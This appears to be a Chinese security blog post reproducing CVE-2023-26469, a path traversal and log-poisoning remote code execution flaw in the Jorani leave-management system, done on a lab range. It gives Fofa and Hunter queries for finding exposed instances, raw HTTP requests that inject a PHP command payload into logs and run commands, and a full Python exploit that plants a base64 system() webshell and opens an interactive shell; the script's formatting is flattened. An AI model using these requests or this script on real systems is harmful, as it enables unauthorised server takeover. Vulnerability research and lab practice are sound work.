靶场环境来自:春秋云镜(挺不错的靶场)。看我上篇文章就知道了。
1、漏洞介绍
Jorani是一款开源的员工考勤和休假管理系统,适用于中小型企业和全球化组织,它简化了员工工时记录、休假请求和审批流程,并提供了多语言支持以满足不同地区的需求。在 Jorani 1.0.0 中,攻击者可以利用路径遍历来访问文件并在服务器上执行代码。
2、漏洞危害
攻击者可以利用路径遍历来访问文件并在服务器上执行代码。
3、漏洞影响
Jorani < 1.0.24、网络测绘
Fofa: title="Jorani"Hunter: web.title="Jorani"
5、漏洞复现
1、获取cookie
GET/session/loginHTTP/1.1Host: xx:xxUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: noneSec-Fetch-User: ?1
2、构造登录poc
POST/session/loginHTTP/1.1Host: xx:xxUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: noneSec-Fetch-User: ?Cookie: csrf_cookie_jorani=78081xxxxd5c91575;jorani_session=68dc56edafe9xxxxxx0c7420175a160e5;Content-Type: application/x-www-form-urlencodedcsrf_test_jorani=78081xxxxd5c91575&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<%3f%3d`$_GET[a]`%3f>&CipheredValue=test
3、通过日志来命令执行
GET/pages/view/log-2024-05-31?a=cat%20/flagHTTP/1.1Host: xx:xxUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: noneSec-Fetch-User: ?X-REQUESTED-WITH: XMLHttpRequestCookie: csrf_cookie_jorani=f9debxxxxxd7c4b1b72f19;jorani_session=9974e1cfxxxx39ebd6b28aad;
6、Exp一键利用
https://github.com/Orange-Cyberdefense/CVE-repository/blob/master/PoCs/CVE_Jorani.py"""vulnerability covered by CVE-2023-26469"""importreadlineimportrequestsimportdatetimeimportsysimportreimportbase64importrandomimportstringrequests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)msg =lambdax,y="n":print(f'x1b[92m[+]x1b[0m{x}', end=y)err =lambdax,y="n":print(f'x1b[91m[x]x1b[0m{x}', end=y)log =lambdax,y="n":print(f'x1b[93m[?]x1b[0m{x}', end=y)CSRF_PATTERN = re.compile('<input type="hidden" name="csrf_test_jorani" value="(.*?)"')CMD_PATTERN = re.compile('---------(.*?)---------', re.S)URLS = {'login':'/session/login','view':'/pages/view/',}alphabet = string.ascii_uppercaseHEADER_NAME =''.join(random.choice(alphabet)foriinrange(12))BypassRedirect = {'X-REQUESTED-WITH':'XMLHttpRequest',HEADER_NAME :""}INPUT ="x1b[92mjrjgjkx1b[0m@x1b[41mjoranix1b[0m(PSEUDO-TERM)n$ "# The input used for the pseudo termu =lambdax,y: x + URLS[y]POISON_PAYLOAD ="<?php if(isset($_SERVER['HTTP_"+ HEADER_NAME +"'])){system(base64_decode($_SERVER['HTTP_"+ HEADER_NAME +"']));} ?>"PATH_TRAV_PAYLOAD ="../../application/logs"if__name__ =='__main__':print("""/!\ Do not use this if you are not authorized to /!\""")log("POC made by @jrjgjk (Guilhem RIOUX)","nn")if(len(sys.argv) ==1):err(f"Usage:{sys.argv[0]}<url>")exit(0)log(f"Header used for exploit:{HEADER_NAME}")t = sys.argv[1]s = requests.Session()log("Requesting session cookie")res = s.get(u(t,"login"), verify =False)C = s.cookies.get_dict()Date = datetime.date.today()log_file_name =f"log-{Date.year}-{str(Date.month).zfill(2)}-{str(Date.day).zfill(2)}"csrf_token = re.findall(CSRF_PATTERN, res.text)[0]log(f"Poisonning log file with payload: '{POISON_PAYLOAD}'")log(f"Set path traversal to '{PATH_TRAV_PAYLOAD}'")msg(f"Recoveredd CSRF Token:{csrf_token}")data = {"csrf_test_jorani": csrf_token,"last_page":"session/login","language": PATH_TRAV_PAYLOAD,"login": POISON_PAYLOAD,"CipheredValue":"DummyPassword"}s.post(u(t,"login"), data=data)log(f"Accessing log file:{log_file_name}")exp_page = t + URLS['view'] + log_file_name### Shellcmd =""whileTrue:cmd = input(INPUT)if(cmdin['x','exit','quit']):breakelif(cmd ==""):continueelse:BypassRedirect[HEADER_NAME] = base64.b64encode(b"echo ---------;"+ cmd.encode() +b" 2>&1;echo ---------;")res = s.get(exp_page, headers=BypassRedirect)cmdRes = re.findall(CMD_PATTERN, res.text)try:print(cmdRes[0])except:print(res.text)err("Wow, there was a problem, are you sure of the URL ??")err('exiting..')exit(0)
原文始发于微信公众号(LHACK安全):春秋云镜-CVE-2023-26469
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论